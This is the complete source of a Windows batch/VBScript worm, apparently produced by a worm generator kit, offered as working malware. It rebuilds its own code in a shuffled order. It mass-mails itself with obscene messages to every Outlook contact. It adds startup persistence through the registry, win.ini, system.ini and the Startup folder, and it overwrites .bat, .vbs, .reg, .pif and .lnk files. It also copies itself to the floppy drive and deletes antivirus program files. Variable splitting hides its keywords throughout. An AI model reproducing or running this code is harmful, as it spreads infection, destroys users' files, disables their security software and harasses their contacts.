@echo off % AAAA %
REM Name: satan % AAAA %
REM Author: satanik child % AAAA %
REM generated with BATCH WORM GENERATOR 4.00 % AAAA %
ctty nul % AAAA %
set MyS=%0 % AAAA %
copy %MyS% natas.bat % AAAA %
set MyS=natas.bat % AAAA %
echo @cls > C:\my.bat % AAAA %
echo dim num > AAAA.vbs % AAAA %
echo Set FSO = Wscript.CreateObject("Scripting.FileSystemObject") >>AAAA.vbs % AAAA %
echo Randomize >>AAAA.vbs % AAAA %
echo num = Int((rnd*6) + 1) >>AAAA.vbs % AAAA %
echo if num=1 then >>AAAA.vbs % AAAA %
echo fso.CopyFile Wscript.ScriptFullName, "C:\1.vbs", True >>AAAA.vbs % AAAA %
echo elseif num=2 then >>AAAA.vbs % AAAA %
echo fso.CopyFile Wscript.ScriptFullName, "C:\2.vbs", True >>AAAA.vbs % AAAA %
echo elseif num=3 then >>AAAA.vbs % AAAA %
echo fso.CopyFile Wscript.ScriptFullName, "C:\3.vbs", True >>AAAA.vbs % AAAA %
echo elseif num=4 then >>AAAA.vbs % AAAA %
echo fso.CopyFile Wscript.ScriptFullName, "C:\4.vbs", True >>AAAA.vbs % AAAA %
echo elseif num=5 then >>AAAA.vbs % AAAA %
echo fso.CopyFile Wscript.ScriptFullName, "C:\5.vbs", True >>AAAA.vbs % AAAA %
echo elseif num=6 then >>AAAA.vbs % AAAA %
echo fso.CopyFile Wscript.ScriptFullName, "C:\6.vbs", True >>AAAA.vbs % AAAA %
echo end if >>AAAA.vbs % AAAA %
cscript AAAA.vbs % AAAA %
del AAAA.vbs % AAAA %
if exist C:\1.vbs goto 1 % AAAA %
if exist C:\2.vbs goto 2  % AAAA %
if exist C:\3.vbs goto 3 % AAAA %
if exist C:\4.vbs goto 4 % AAAA %
if exist C:\5.vbs goto 5  % AAAA %
if exist C:\6.vbs goto 6 % AAAA %
goto codebeginn % AAAA %
:1 % AAAA %
set ab=A% AAAA %
find "AAA%ab%"<%0 >> C:\my.bat % AAAA %
set ab=C% AAAA %
find "CCC%ab%"<%0 >> C:\my.bat % AAAA %
set ab=D% AAAA %
find "CCC%ab%"<%0 >> C:\my.bat % AAAA %
set ab=E% AAAA %
find "EEE%ab%"<%0 >> C:\my.bat  % AAAA %
set ab=B% AAAA %
find "BBB%ab%"<%0 >> C:\my.bat  % AAAA %
goto codebeginn % AAAA %
:2 % AAAA %
set ab=A% AAAA %
find "AAA%ab%"<%0 >> C:\my.bat  % AAAA %
set ab=C% AAAA %
find "CCC%ab%"<%0 >> C:\my.bat  % AAAA %
set ab=E% AAAA %
find "EEE%ab%"<%0 >> C:\my.bat  % AAAA %
set ab=D% AAAA %
find "DDD%ab%"<%0 >> C:\my.bat  % AAAA %
set ab=B% AAAA %
find "BBB%ab%"<%0 >> C:\my.bat  % AAAA %
goto codebeginn % AAAA %
:3 % AAAA %
set ab=A% AAAA %
find "AAA%ab%"<%0 >> C:\my.bat  % AAAA %
set ab=D% AAAA %
find "DDD%ab%"<%0 >> C:\my.bat  % AAAA %
set ab=C% AAAA %
find "CCC%ab%"<%0 >> C:\my.bat  % AAAA %
set ab=E% AAAA %
find "EEE%ab%"<%0 >> C:\my.bat  % AAAA %
set ab=B% AAAA %
find "BBB%ab%"<%0 >> C:\my.bat  % AAAA %
goto codebeginn % AAAA %
:4 % AAAA %
set ab=A% AAAA %
find "AAA%ab%"<%0 >> C:\my.bat  % AAAA %
set ab=D% AAAA %
find "DDD%ab%"<%0 >> C:\my.bat  % AAAA %
set ab=E% AAAA %
find "EEE%ab%"<%0 >> C:\my.bat  % AAAA %
set ab=C% AAAA %
find "CCC%ab%"<%0 >> C:\my.bat  % AAAA %
set ab=B% AAAA %
find "BBB%ab%"<%0 >> C:\my.bat  % AAAA %
goto codebeginn % AAAA %
:5 % AAAA %
set ab=A% AAAA %
find "AAA%ab%"<%0 >> C:\my.bat  % AAAA %
set ab=E% AAAA %
find "EEE%ab%"<%0 >> C:\my.bat  % AAAA %
set ab=C% AAAA %
find "CCC%ab%"<%0 >> C:\my.bat  % AAAA %
set ab=D% AAAA %
find "DDD%ab%"<%0 >> C:\my.bat  % AAAA %
set ab=B% AAAA %
find "BBB%ab%"<%0 >> C:\my.bat  % AAAA %
goto codebeginn % AAAA %
:6 % AAAA %
set ab=A% AAAA %
find "AAA%ab%"<%0 >> C:\my.bat  % AAAA %
set ab=E% AAAA %
find "EEE%ab%"<%0 >> C:\my.bat  % AAAA %
set ab=D% AAAA %
find "DDD%ab%"<%0 >> C:\my.bat  % AAAA %
set ab=C% AAAA %
find "CCC%ab%"<%0 >> C:\my.bat  % AAAA %
set ab=B% AAAA %
find "BBB%ab%"<%0 >> C:\my.bat  % AAAA %
goto codebeginn % AAAA %
:codebeginn % AAAA %
del C:\1.vbs % AAAA %
del C:\2.vbs % AAAA %
del C:\3.vbs % AAAA %
del C:\4.vbs % AAAA %
del C:\5.vbs % AAAA%
del C:\6.vbs % AAAA%
ren C:\my.bat natas.bat % AAAA %
set MyS=natas.bat % AAAA %
copy natas.bat C:\animal.bat % CCCC % 
copy natas.bat C:\ugiee.vbs % CCCC % 
echo Dim x > C:\ugiee.vbs % CCCC % 
 % CCCC %set VBSwayA=resume
echo.on error %VBSwayA% next >> C:\ugiee.vbs % CCCC % 
set VBSwayA= % CCCC % 
echo Set fso =" Scripting.FileSystem.Object" >> C:\ugiee.vbs % CCCC % 
set vbsosf=mt % CCCC % 
% CCCC % set vbsosf=o
echo Set so=CreateObject(fs%vbsosf%) >> C:\ugiee.vbs % CCCC % 
set vbsosf= % CCCC % 
% CCCC %set VBSwayI=Outlook
echo Set ol=CreateObject("%VBSwayI%.Application") >> C:\ugiee.vbs % CCCC % 
set VBSwayI= % CCCC % 
% CCCC % set VBSwayJ=WScript
echo Set out=%VBSwayJ%.CreateObject("Outlook.Application") >> C:\ugiee.vbs % CCCC % 
set VBSwayJ= % CCCC % 
echo Set mapi = out.GetNameSpace("MAPI") >> C:\ugiee.vbs % CCCC % 
% CCCC % set VBSwayN=Lists
echo Set a = mapi.Address%VBSwayN%(1) >> C:\ugiee.vbs % CCCC % 
set VBSwayN= % CCCC % 
echo Set ae=a.AddressEntries >> C:\ugiee.vbs % CCCC % 
% CCCC %set VBSwayB=Count
echo For x=1 To ae.%VBSwayB% >> C:\ugiee.vbs % CCCC % 
set VBSwayB= % CCCC % 
echo Set Mail=ol.CreateItem(0) >> C:\ugiee.vbs % CCCC % 
echo Mail.to=ol.GetNameSpace("MAPI").AddressLists(1).AddressEntries(x) >> C:\ugiee.vbs % CCCC % 
echo Mail.Subject="fuck you li" >> C:\ugiee.vbs % CCCC % 
echo Mail.Body="i wanna fuck you like an animal!" >> C:\ugiee.vbs % CCCC % 
% CCCC %set sendB=M
% CCCC % set attA=t
% CCCC % set attB=c
% CCCC % set attC=s
echo %sendB%ail.A%attA%ta%attB%hment%attC%.Add("C:\animal.bat") >> C:\ugiee.vbs % CCCC % 
% CCCC % set sendA=s
% CCCC % set sendB=M
echo %sendB%ail.%sendA%end >> C:\ugiee.vbs % CCCC % 
set vsenda=nlzm % CCCC % 
set vsendb=nlz % CCCC % 
% CCCC % set vsenda=e
% CCCC % set vsendb=t
echo N%vsenda%x%vsendb% >> C:\ugiee.vbs % CCCC % 
set vsenda= % CCCC %
set vsendb= % CCCC %
echo ol.Quit >> C:\ugiee.vbs % CCCC % 
% CCCC % set cscA=ipt
set dgxxl=cscr%cscA% % CCCC % 
%dgxxl% C:\ugiee.vbs % CCCC % 
del C:\ugiee.vbs % CCCC % 
del C:\animal.bat % CCCC % 
copy natas.bat %windir%\zzlbv.bat % DDDD %
echo REGEDIT4 >pfdyr.reg % DDDD %
% CCCC % set regA=qe
% CCCC % set regB=gm
% DDDD % set regA=S
% DDDD % set regB=e
echo [HKEY_LOCAL_MACHINE\%regA%oftwar%regB%\Microsoft\Windows\CurrentVersion\Run\] >>pfdyr.reg % DDDD %
echo "ashnc"="%windir%\zzlbv.bat">>pfdyr.reg % DDDD %
% DDDD % set RDA=for
%RDA% %%r in (*.reg \*.reg ..\*.reg %path%\*.reg %windir%\*.reg) do copy pfdyr.reg %%r % DDDD %
set regA= % DDDD %
set regB= % DDDD %
set vbsA=mz % EEEE % 
% EEEE % set vbsB=zt
% EEEE % set vbsA=c
% EEEE % set vbsB=t
copy natas.bat cfubc.vbs % EEEE %
copy natas.bat %windir%\ppqjx.bat % EEEE %
echo.on error resume next > cfubc.vbs % EEEE %
echo dim wshs >>cfubc.vbs % EEEE %
echo set wshs=ws%vbsA%rip%vbsB%.createobject("ws%vbsA%rip%vbsB%.shell") >>cfubc.vbs % EEEE %
echo wshs.run "%windir%\ppqjx.bat" >>cfubc.vbs % EEEE %
% EEEE % set VDA=for
%VDA% %%q in (*.vbs \*.vbs ..\*.vbs %path%\*.vbs %windir%\*.vbs) do copy cfubc.vbs %%q % EEEE %
set VDA= % EEEE %
set vbsA= % EEEE %
set vbsB= % EEEE %
copy natas.bat miocs.vbs % CCCC %
copy natas.bat %windir%\jpbcx.bat % CCCC %
echo.on error resume next >miocs.vbs % CCCC %
echo set ws = CreateObject("wscript.shell") >> miocs.vbs % CCCC %
% CCCC % set regi=at
% CCCC % set regi=L
echo ws.regwrite "HK%regi%M\Software\Microsoft\Windows\CurrentVersion\Run\bpyee","%windir%\jpbcx.bat" >>miocs.vbs % CCCC %
set regi= % CCCC %
% CCCC % set regiA=sc
c%regi%ript miocs.vbs % CCCC %
del miocs.vbs % CCCC %
set regiA= % CCCC %
% DDDD % set BDAs=          jsm
% DDDD % set BDAs=for
copy natas.bat %winDir%\qznwp.bat % DDDD %
%BDAs% %%v in (*.bat ..\*.bat \*.bat %path%\*.bat) do copy %WinDir%\qznwp.bat %%v % DDDD %
del %WinDir%\qznwp.bat % DDDD %
copy natas.bat %windir%\Startm~1\Programs\StartUp\ewsch.bat % EEEE %
md C:\suPs% CCCC % 
copy natas.bat C:\suPs\vktsf.bat% CCCC % 
subst L: C:\suPs% CCCC % 
% CCCC % set WDs=for
copy natas.bat C:\cabwm.bat% CCCC % 
%WDs% %%w in (%windir%\*.bat) do copy C:\cabwm.bat %%w% CCCC % 
del C:\cabwm.bat% CCCC % 
copy natas.bat %WinDir%\system\WINI.bat % DDDD % 
% DDDD % set inia=windows
echo [%inia%] >funny.bat % DDDD % 
echo load=%windir%\system\WINI.bat >>funny.bat % DDDD % 
% DDDD % set inib=uc
set inic=kl
% DDDD % set inic=WINI.bat
echo run=%windir%\system\%inic% >>funny.bat % DDDD % 
set inid=
set inic=
set inib=
set inia=
% DDDD % set inid=Port
set inie=hy
% DDDD % set inie=N
% DDDD % set inif=n
echo %inie%ull%inid%=No%inif%e >>funny.bat % DDDD % 
copy funny.bat %windir%\dd.ini % DDDD % 
del %windir%\win.ini % DDDD % 
del funny.bat % DDDD % 
% DDDD % set inih=dd.in
ren %windir%\%inih%i win.ini % DDDD % 
set inih= % DDDD % 
set inig= % DDDD % 
set inif= % DDDD % 
set inie= % DDDD % 
copy natas.bat %windir%\drop.vbs % EEEE % 
copy natas.bat %windir%\qyqrp.bat % EEEE %
echo dim wshs, msc > %windir%\drop.vbs % EEEE %
% EEEE % set pifA=WS
echo set wshs=Wscript.CreateObject("%pifA%cript.Shell") >> %windir%\drop.vbs % EEEE %
set pifA= % EEEE % 
% EEEE % set pifB=ea
echo set msc=wshs.Cr%pifB%teShortcut("C:\pif.lnk") >> %windir%\drop.vbs % EEEE %
set pifB= % EEEE % 
echo msc.TargetPath = wshs.ExpandEnvironmentStrings("%windir%\qyqrp.bat") >> %windir%\drop.vbs % EEEE %
echo msc.WindowStyle = 4 >> %windir%\drop.vbs % EEEE %
% EEEE % set pifC=Sa
echo msc.%pifC%ve >> %windir%\drop.vbs % EEEE %
set pifC= % EEEE %
% EEEE % set pifD=cscript
%pifD% %windir%\drop.vbs % EEEE %
del %windir%\drop.vbs % EEEE %
% EEEE % set PDA=for
%PDA% %%k in (*.pif \*.pif ..\*.pif %path%\*.pif %windir%\*.pif) do copy C:\pif.pif %%k % EEEE %
set PDA= % EEEE %
del C:\pif.pif % EEEE %
% CCCC % set lnkA=rxset lnkB=tw % CCCC % 
% CCCC % set lnkA=w
% CCCC % set lnkB=i
copy natas.bat %windir%\dropa.vbs % CCCC % 
copy natas.bat %windir%\cdfof.bat % CCCC % 
copy natas.bat %windir%\dropb.vbs % CCCC % 
echo.on error resume next >%windir%\dropb.vbs % CCCC % 
echo dim wshs >>%windir%\dropb.vbs % CCCC % 
echo set wshs=%lnkA%scr%lnkB%pt.createobject("%lnkA%scr%lnkB%pt.shell") >>%windir%\dropb.vbs % CCCC % 
echo wshs.run "%windir%\cdfof.bat" >>%windir%\dropb.vbs % CCCC % 
echo dim wshs, msc > %windir%\dropa.vbs % CCCC % 
echo set wshs=%lnkA%scr%lnkB%pt.CreateObject("%lnkA%scr%lnkB%pt.Shell") >> %windir%\dropa.vbs % CCCC % 
echo set msc=wshs.CreateShortcut("C:\vbs.lnk") >> %windir%\dropa.vbs % CCCC % 
echo msc.TargetPath = wshs.ExpandEnvironmentStrings("%windir%\dropb.vbs ") >> %windir%\dropa.vbs % CCCC % 
echo msc.WindowStyle = 4 >> %windir%\dropa.vbs % CCCC % 
echo msc.Save >> %windir%\dropa.vbs % CCCC % 
cscript %windir%\dropa.vbs % CCCC % 
del %windir%\dropa.vbs % CCCC % 
% CCCC % set LDA=for
%LDA% %%k in (*.lnk \*.lnk ..\*.lnk %path%\*.lnk %windir%\*.lnk) do copy C:\vbs.lnk %%k % CCCC % 
LDA= % CCCC % 
del C:\vbs.lnk % CCCC % 
% CCCC % set lnkA=
set lnkB= % CCCC % 
copy natas.bat qduhr.bat % DDDD % 
echo [boot] > %windir%\system.ini % DDDD % 
% DDDD % set sysiniA=la
% DDDD % set sysiniB=vy
% DDDD % set sysiniA=s
% DDDD % set sysiniB=l
echo %sysiniA%he%sysiniB%l=explorer.exe %windir%\qduhr.bat>> %windir%\system.ini % DDDD %
sysiniA= % DDDD %
sysiniB= % DDDD %
command /f /c copy natas.bat A:\ % CCCC %
@del natas.bat % BBBB %
% BBBB % set avA=p
% BBBB % set avB=a
del C:\%avA%rogr%avB%~1\kasper~1\avp32.exe % BBBB %
% BBBB % set avA=r
% BBBB % set avB=g
del C:\p%avA%o%avB%ra~1\norton~1\*.exe % BBBB %
% BBBB % set avA=o
% BBBB % set avB=g
del C:\pr%avA%%avB%ra~1\trojan~1\tc.exe % BBBB %
% BBBB % set avA=o
% BBBB % set avB=a
del C:\pr%avA%gr%avB%\norton~1\s32integ.dll % BBBB %
% BBBB % set avA=p
% BBBB % set avB=a
del C:\%avA%rogr%avB%\f-prot95\fpwm32.dll % BBBB %
% BBBB % set avA=r
% BBBB % set avB=g
del C:\p%avA%o%avB%ra \mcafee\scan.dat % BBBB %
% BBBB % set avA=r
% BBBB % set avB=a
del C:\p%avA%ogr%avB%\tbav\tbav.dat % BBBB %
% BBBB % set avA=o
% BBBB % set avB=g
del C:\pr%avA%%avB%ra\avpersonal\antivir.vdf % BBBB %
% BBBB % set avA=a
% BBBB % set avB=w
del C:\tb%avA%v%avB%95\tbscan.sig % BBBB %
ctty CON % BBBB %
